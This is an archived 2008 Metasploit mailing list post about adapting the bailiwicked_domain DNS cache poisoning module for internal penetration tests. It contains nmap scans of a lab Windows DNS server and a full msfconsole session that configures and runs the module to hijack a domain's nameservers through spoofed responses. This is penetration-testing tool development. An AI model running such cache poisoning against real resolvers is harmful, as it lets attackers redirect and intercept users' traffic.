Metasploit mailing list archives
DNS cache poisoning difficulty
From: natron at invisibledenizen.org (natron)
Date: Tue, 29 Jul 2008 18:35:40 -0500
I gave a shot at implementing this and I believe it works. You now have an optional variable where you can set the DNS servers arbitrarily. When set, it'll skip the authoritative checks and only use your DNS server list. You'd probably only want to use this if you were internal. An example scenario would be: client --> AD server --> authoritative company DNS resolver --> internet DNS servers This would be for attacking "AD server" when you know "authoritative company DNS resolver" as well as the "AD Server" source port used to communicate with the resolver. I've also found that when doing an nmap -sU -sV scan against an AD DNS server, the port AD is using to forward is returning junk nmap doesn't know what to do with (well, at least my version of nmap -- i didn't try an upgrade). See the examples below. You'll notice that the first scan is jibberish, but scans 2 - 4 all contain the string "root-servers". FYI, this is running against Windows 2003 under VMWare ESX (obviously without MS08-037 applied). Please test this, someone, to see if it's working properly in your environment. It looks like it's working correctly when I monitor it in wireshark, but I've been unsuccessful in poisoning the local cache. I believe this to be a combination of the short race time on a LAN and my inherent impatience. Bugs: I don't believe the racer functionality is working for some reason; I'm not sure what I broke. I have to set it the XIDS manual or it loops on the racer check. Nathan Example: [root at localhost dns]# nmap -sU -sV -p- 172.16.1.251 Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:25 CDT Interesting ports on 172.16.1.251: Not shown: 65519 closed ports PORT STATE SERVICE VERSION 53/udp open domain Microsoft DNS 88/udp open|filtered kerberos-sec 123/udp open ntp NTP v3 137/udp open netbios-ns Microsoft Windows NT netbios-ssn (workgroup: xxxxxxxx) 138/udp open|filtered netbios-dgm 389/udp open|filtered ldap 445/udp open|filtered microsoft-ds 464/udp open|filtered kpasswd5 500/udp open|filtered isakmp 1029/udp open|filtered unknown 1033/udp open unknown 1218/udp open|filtered unknown 1225/udp open|filtered unknown 1234/udp open|filtered unknown 1434/udp open ms-sql-m Microsoft SQL Server 8.00.194 (ServerName: xxxx; TCPPort: xxxx) 4500/udp open|filtered sae-urn 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DE8CB%P=i686-pc-linux-gnu%r(NBTS SF:tat,1E1,"\x80\xf0\x80\x80\0\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAA SF:AAAAAAAA\0\0!\0\x01\0\0\x02\0\x01\0\x01F<\0\x14\x01a\x0croot-servers\x0 SF:3net\0\xc02\0\x02\0\x01\0\x01F<\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01 SF:F<\0\x04\x01c\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01d\xc0\?\xc02\0\x0 SF:2\0\x01\0\x01F<\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01f\xc SF:0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01F<\ SF:0\x04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01i\xc0\?\xc02\0\x02\0 SF:\x01\0\x01F<\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01k\xc0\? SF:\xc02\0\x02\0\x01\0\x01F<\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x SF:04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01F<\0\x04\xc6\)\0\x04\xc0\]\0\x01\0\ SF:x01\0\x01F<\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01F<\0\x04\xc0!\x04\ SF:x0c\xc0}\0\x01\0\x01\0\x01F<\0\x04\x80\x08\nZ\xc0\x8d\0\x01\0\x01\0\x01 SF:F<\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0\x01F<\0\x04\xc0\x05\x05\xf SF:1\xc0\xad\0\x01\0\x01\0\x01F<\0\x04\xc0p\$\x04\xc0\xbd\0\x01\0\x01\0\x0 SF:1FB\0\x04\x80\?\x025\xc0\xcd\0\x01\0\x01\0\x01F<\0\x04\xc0\$\x94\x11\xc SF:0\xdd\0\x01\0\x01\0\x01F<\0\x04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01F SF:<\0\x04\xc1\0\x0e\x81\xc0\xfd\0\x01\0\x01\0\x01F<\0\x04\xc7\x07S\*\xc1\ SF:r\0\x01\0\x01\0\x01F<\0\x04\xca\x0c\x1b!"); MAC Address: 00:0C:29:A7:D4:3C (VMware) Service Info: Host: ZEUS; OS: Windows Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 122.822 seconds [root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251 Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:27 CDT Interesting ports on 172.16.1.251: PORT STATE SERVICE VERSION 1033/udp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DE94A%P=i686-pc-linux-gnu%r(RPCC SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\ SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0 SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02 SF:\0\x01\0\x01E\xaf\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\ SF:0\x01E\xaf\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01c\xc0\ SF:?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01E\ SF:xaf\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01f\xc0\?\xc02\ SF:0\x02\0\x01\0\x01E\xaf\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01i\xc0\?\xc02\0\x02\0 SF:\x01\0\x01E\xaf\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01k SF:\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\ SF:x01E\xaf\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01E\xaf\0\x04\xc6\)\0\x04 SF:\xc0\]\0\x01\0\x01\0\x01E\xaf\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01 SF:E\xaf\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01E\xaf\0\x04\x80\x08\nZ\x SF:c0\x8d\0\x01\0\x01\0\x01E\xaf\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0 SF:\x01E\xaf\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01E\xaf\0\x04\xc SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01E\xb5\0\x04\x80\?\x025\xc0\xcd\0\x01\ SF:0\x01\0\x01E\xaf\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01E\xaf\0\x SF:04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01E\xaf\0\x04\xc1\0\x0e\x81\xc0\ SF:xfd\0\x01\0\x01\0\x01E\xaf\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01E\xa SF:f\0\x04\xca\x0c\x1b!"); MAC Address: 00:0C:29:A7:D4:3C (VMware) [root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251 Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:40 CDT Interesting ports on 172.16.1.251: PORT STATE SERVICE VERSION 1033/udp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DEC45%P=i686-pc-linux-gnu%r(RPCC SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\ SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0 SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02 SF:\0\x01\0\x01B\xb4\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\ SF:0\x01B\xb4\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01c\xc0\ SF:?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01B\ SF:xb4\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01f\xc0\?\xc02\ SF:0\x02\0\x01\0\x01B\xb4\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01i\xc0\?\xc02\0\x02\0 SF:\x01\0\x01B\xb4\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01k SF:\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\ SF:x01B\xb4\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01B\xb4\0\x04\xc6\)\0\x04 SF:\xc0\]\0\x01\0\x01\0\x01B\xb4\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01 SF:B\xb4\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01B\xb4\0\x04\x80\x08\nZ\x SF:c0\x8d\0\x01\0\x01\0\x01B\xb4\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0 SF:\x01B\xb4\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01B\xb4\0\x04\xc SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01B\xba\0\x04\x80\?\x025\xc0\xcd\0\x01\ SF:0\x01\0\x01B\xb4\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01B\xb4\0\x SF:04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01B\xb4\0\x04\xc1\0\x0e\x81\xc0\ SF:xfd\0\x01\0\x01\0\x01B\xb4\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01B\xb SF:4\0\x04\xca\x0c\x1b!"); MAC Address: 00:0C:29:A7:D4:3C (VMware) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.617 seconds [root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251 Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:43 CDT Interesting ports on 172.16.1.251: PORT STATE SERVICE VERSION 1033/udp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DECDA%P=i686-pc-linux-gnu%r(RPCC SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\ SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0 SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02 SF:\0\x01\0\x01B\x1f\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\ SF:0\x01B\x1f\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01c\xc0\ SF:?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01B\ SF:x1f\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01f\xc0\?\xc02\ SF:0\x02\0\x01\0\x01B\x1f\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01i\xc0\?\xc02\0\x02\0 SF:\x01\0\x01B\x1f\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01k SF:\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\ SF:x01B\x1f\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01B\x1f\0\x04\xc6\)\0\x04 SF:\xc0\]\0\x01\0\x01\0\x01B\x1f\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01 SF:B\x1f\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01B\x1f\0\x04\x80\x08\nZ\x SF:c0\x8d\0\x01\0\x01\0\x01B\x1f\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0 SF:\x01B\x1f\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01B\x1f\0\x04\xc SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01B%\0\x04\x80\?\x025\xc0\xcd\0\x01\0\x SF:01\0\x01B\x1f\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01B\x1f\0\x04\ SF:xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01B\x1f\0\x04\xc1\0\x0e\x81\xc0\xfd SF:\0\x01\0\x01\0\x01B\x1f\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01B\x1f\0 SF:\x04\xca\x0c\x1b!"); MAC Address: 00:0C:29:A7:D4:3C (VMware) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.623 seconds [root at localhost msf-dev]# ./msfconsole _ | | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / \_|/ \_|/ / \_| | | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/ /| \| =[ msf v3.2-release + -- --=[ 299 exploits - 124 payloads + -- --=[ 18 encoders - 6 nops =[ 68 aux msf auxiliary(bailiwicked_domain) > set DOMAIN invisibledenizen.org DOMAIN => invisibledenizen.org msf auxiliary(bailiwicked_domain) > set SRCPORT 1033 SRCPORT => 1033 msf auxiliary(bailiwicked_domain) > set SRCDNS "172.16.1.1, 10.10.10.10" SRCDNS => 172.16.1.1, 10.10.10.10 msf auxiliary(bailiwicked_domain) > set SRCDNS 172.16.1.1 SRCDNS => 172.16.1.1 msf auxiliary(bailiwicked_domain) > set XIDS 20 XIDS => 20 msf auxiliary(bailiwicked_domain) > set NEWDNS fakedns.visibledenizens.org NEWDNS => fakedns.visibledenizens.org msf auxiliary(bailiwicked_domain) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN invisibledenizen.org yes The domain to hijack NEWDNS fakedns.visibledenizens.org yes The hostname of the replacement DNS server RECONS 208.67.222.222 yes The nameserver used for reconnaissance RHOST 172.16.1.251 yes The target address SRCADDR Real yes The source address to use for sending the queries (accepted: Real, Random) SRCDNS 172.16.1.1 no An optional list of DNS servers to spoof as ("10.1.1.1, 10.2.2.2" format) SRCPORT 1033 yes The target server's source query port (0 for automatic) TTL 34282 yes The TTL for the malicious host entry XIDS 20 yes The number of XIDs to try for each query (0 for automatic) msf auxiliary(bailiwicked_domain) > save Saved configuration to: /root/.msf3/config msf auxiliary(bailiwicked_domain) > run [*] Targeting nameserver 172.16.1.251 for injection of invisibledenizen.org. nameservers as fakedns.visibledenizens.org [*] Added 172.16.1.1 into list of domains to spoof as. [*] Attempting to inject poison records for invisibledenizen.org.'s nameservers into 172.16.1.251:1033... [*] Sent 1000 queries and 20000 spoofed responses... [*] Sent 2000 queries and 40000 spoofed responses... [*] Sent 3000 queries and 60000 spoofed responses... [*] Sent 4000 queries and 80000 spoofed responses... [*] Sent 5000 queries and 100000 spoofed responses... On Tue, Jul 29, 2008 at 2:21 PM, H D Moore <hdm at metasploit.com> wrote:
With your setup, the exploits won't work. You could modify the exploit locally, remove the authoritative checks, and hardcode barbs = [ "ip1", "ip2", "ip3"]. Alternatively, add a new option to specify the list of nameservers to spoof and submit the patch :-) On Tuesday 29 July 2008, Sat Jagat Singh wrote:In testing the spoof/dns/bailiwicked_host (and also bailiwicked_domain) modules on an internal penetration test I have encountered a challenge with firewall filtering of egress to external DNS servers. Let me be clear, I am on the LAN. DNS traffic is not permitted out to the internet except from the organization's own internal DNS servers that perform recursive queries for internal users.Metasploit gets to a point where it attempts to query yahoo's nameserver for authoritativeness and just hangs since the traffic gets dropped at the firewall.Any suggestions?_______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
-------------- next part -------------- A non-text attachment was scrubbed... Name: bailiwicked_domain.patch Type: text/x-diff Size: 5119 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080729/8f45326e/attachment.patch>
Current thread:
- DNS cache poisoning difficulty Sat Jagat Singh (Jul 29)
- DNS cache poisoning difficulty H D Moore (Jul 29)
- DNS cache poisoning difficulty Jefferson, Shawn (Jul 29)
- DNS cache poisoning difficulty H D Moore (Jul 29)
- DNS cache poisoning difficulty natron (Jul 29)
- DNS cache poisoning difficulty Jefferson, Shawn (Jul 29)
- DNS cache poisoning difficulty H D Moore (Jul 29)